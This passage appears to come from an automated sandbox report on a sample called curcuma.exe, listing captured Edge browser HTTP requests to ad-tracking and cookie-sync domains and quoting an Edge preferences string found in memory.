User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /getuid?ld=1&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1
Host: eb2.3lift.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /visitor/sync?uid=9871605be8d4b2a982914bf5c9348e7b&name=MSN&visitor=0DDB686F4DAE69E20AF07DC74C2A6898&external=true&gdpr=0&gdpr_consent= HTTP/1.1
Host: visitor.omnitagjs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /cs/msn?id=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1
Host: trace.mediago.io
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=7af2a3f4-e29e-46f6-8bb1-bb526b3dff9b&ii=1&c=13632534912796677099&bid=bef813bc-b568-41df-9b1e-3d66353a0ada&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1 HTTP/1.1
Host: srtb.msn.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D

Source: global traffic, HTTP traffic detected:
GET /oRTB?redirect={PubRedirectUrl}&gdpr=0&gdpr_consent= HTTP/1.1
Host: sync.inmobi.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=resriver&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=0230aa10-aefe-4507-a806-0ed773d001f4&ii=1&c=16708633625282948573&bid=bef813bc-b568-41df-9b1e-3d66353a0ada&tid=edgechrntp-resriver-1&ptid=edgechrntp-resriver-1 HTTP/1.1
Host: srtb.msn.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D

Source: global traffic, HTTP traffic detected:
GET /getuid?https://c.bing.com/c.gif?anx_uid=$UID&Red3=MSAN_pd&gdpr=0&gdpr_consent= HTTP/1.1
Host: ib.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /cs/msn?id=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1
Host: trace.popin.cc
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /mapuid?member=280&user=0DDB686F4DAE69E20AF07DC74C2A6898;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0DDB686F4DAE69E20AF07DC74C2A6898%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1
Host: m.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fc.bing.com%2Fc.gif%3Fanx_uid%3D%24UID%26Red3%3DMSAN_pd%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
Host: ib.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0DDB686F4DAE69E20AF07DC74C2A6898%3B%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0DDB686F4DAE69E20AF07DC74C2A6898%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1
Host: m.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /sync?redirect=%7BPubRedirectUrl%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry= HTTP/1.1
Host: sync.inmobi.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Source: global traffic, HTTP traffic detected:
GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=infopane&i=3&p=edgechrntp&l=en-us&d=bing&b=Edg&a=7be4f360-7a45-4690-9827-f98ea0750a81&ii=1&c=4886528655992380158&bid=0dc69f93-1809-4c34-890e-36ab305fca5b&tid=edgechrntp-infopane-3&ptid=edgechrntp-peekinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1
Host: srtb.msn.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_Auth=; sptmarket=en-us||us|en-us|en-us|en||cf=8|RefA=1309CA76ED03451A921A0B8E388ABE7F.RefC=2025-03-07T16:50:24Z; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898

Source: global traffic, HTTP traffic detected:
GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=infopane&i=11&p=edgechrntp&l=en-us&d=bing&b=Edg&a=61926c86-c943-4aaa-9700-8c55594c9cc6&ii=1&c=8361246589242145283&bid=0dc69f93-1809-4c34-890e-36ab305fca5b&tid=edgechrntp-infopane-11&ptid=edgechrntp-peekInfopane-2&t=type.msft-content-card&dec=1-1 HTTP/1.1
Host: srtb.msn.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_Auth=; sptmarket=en-us||us|en-us|en-us|en||cf=8|RefA=1309CA76ED03451A921A0B8E388ABE7F.RefC=2025-03-07T16:50:24Z; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898

Source: global traffic, HTTP traffic detected:
GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=infopane&i=15&p=edgechrntp&l=en-us&d=bing&b=Edg&a=c2d5071e-7ea2-4638-95e9-9e3dc320cc86&ii=1&c=15962976797232155595&bid=0dc69f93-1809-4c34-890e-36ab305fca5b&tid=edgechrntp-infopane-15&ptid=edgechrntp-peekinfopane-3&t=type.msft-content-card&dec=1-1 HTTP/1.1
Host: srtb.msn.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_Auth=; sptmarket=en-us||us|en-us|en-us|en||cf=8|RefA=1309CA76ED03451A921A0B8E388ABE7F.RefC=2025-03-07T16:50:24Z; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898

Source: global traffic, HTTP traffic detected:
GET /notify/served?rid=ce27969ba8d74822be092ffeaaaf385a&r=resinfopane&i=6&p=edgechrntp&l=en-us&d=bing&b=Edg&a=80005825-8f03-421c-96d9-39c079d8b6a8&ii=1&c=7461836026324319374&bid=0dc69f93-1809-4c34-890e-36ab305fca5b&tid=edgechrntp-resinfopane-6&ptid=edgechrntp-resinfopane-1&t=type.msft-content-card&dec=1-1 HTTP/1.1
Host: srtb.msn.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: USRLOC=; MUID=0DDB686F4DAE69E20AF07DC74C2A6898; _EDGE_S=F=1&SID=09B6721C09FF608E3C5C67B408E461B2; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_Auth=; sptmarket=en-us||us|en-us|en-us|en||cf=8|RefA=1309CA76ED03451A921A0B8E388ABE7F.RefC=2025-03-07T16:50:24Z; MUIDB=0DDB686F4DAE69E20AF07DC74C2A6898

Source: global traffic, HTTP traffic detected:
GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
Host: m.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0DDB686F4DAE69E20AF07DC74C2A6898%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1
Host: m.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /mapuid?member=280&user=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0DDB686F4DAE69E20AF07DC74C2A6898%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1
Host: m.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /bounce?%2Fmapuid%3Fmember%3D280%26user%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D%26redir%3Dhttps%253A%252F%252Fm.adnxs.com%252Fseg%253Fadd%253D5159620%2526redir%253Dhttps%25253A%25252F%25252Fib.adnxs.com%25252Fsetuid%25253Fentity%25253D483%252526code%25253D0DDB686F4DAE69E20AF07DC74C2A6898%252526gdpr%25253D0%252526gdpr_consent%25253D HTTP/1.1
Host: m.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /seg?add=5159620&redir=https%3A%2F%2Fib.adnxs.com%2Fsetuid%3Fentity%3D483%26code%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
Host: m.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /setuid?entity=483&code=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1
Host: ib.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
Host: ib.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /bounce?%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D0DDB686F4DAE69E20AF07DC74C2A6898%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1
Host: m.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /setuid?entity=483&code=0DDB686F4DAE69E20AF07DC74C2A6898&gdpr=0&gdpr_consent= HTTP/1.1
Host: ib.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Source: global traffic, HTTP traffic detected:
GET /bounce?%2Fsetuid%3Fentity%3D483%26code%3D0DDB686F4DAE69E20AF07DC74C2A6898%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1
Host: ib.adnxs.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Source: curcuma.exe, 00000025.00000003.1739334877.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: "pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 